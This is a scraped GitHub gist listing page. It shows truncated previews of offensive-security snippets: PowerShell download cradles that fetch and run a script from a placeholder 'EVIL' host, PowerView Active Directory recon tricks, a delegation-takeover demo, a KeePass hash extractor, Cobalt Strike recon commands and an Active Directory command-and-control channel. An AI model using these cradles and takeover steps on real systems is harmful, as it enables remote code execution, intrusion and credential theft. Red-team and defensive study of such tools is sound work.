Skip to content

Instantly share code, notes, and snippets.

View HarmJ0y's full-sized avatar
💭
Coding towards chaotic good while living on the decision boundary

Will Schroeder HarmJ0y

💭
Coding towards chaotic good while living on the decision boundary
View GitHub Profile
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active June 24, 2025 17:06
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active June 18, 2025 16:56
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active May 18, 2025 13:19
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server
@HarmJ0y
HarmJ0y / rbcd_demo.ps1
Last active May 15, 2025 07:55
Resource-based constrained delegation computer DACL takeover demo
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
@HarmJ0y
HarmJ0y / keepass2john.py
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#
@HarmJ0y
HarmJ0y / Start-FileSystemMonitor.ps1
Last active April 23, 2025 13:23
Start-FileSystemMonitor
Function Start-FileSystemMonitor {
<#
.SYNOPSIS
This function will monitor one or more file paths for any file
creation, deletion, modification, or renaming events. Data including
the change type, ACL for the file, etc. is output to the screen or
a specified -LogFile.
If -InjectShellCmd is specified, the given command is inserted into
@HarmJ0y
HarmJ0y / gist:57f1dac93fcc3564f9b3
Created October 23, 2014 13:53
domain user to sid and sid to user
# user to SID
(New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value
# SID to user
(New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value
@HarmJ0y
HarmJ0y / Jenkinsfile
Created November 2, 2020 23:15
Rubeus Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL: https://github.com/GhostPack/Seatbelt
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = "https://github.com/GhostPack/Seatbelt"
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@HarmJ0y
HarmJ0y / ADC2.ps1
Last active December 21, 2024 07:23
Command and Control channel through Active Directory Object Properties
#Requires -Version 2
function New-ADPayload {
<#
.SYNOPSIS
Stores PowerShell logic in the mSMQSignCertificates of the specified -TriggerAccount and generates
a one-line launcher.
Author: @harmj0y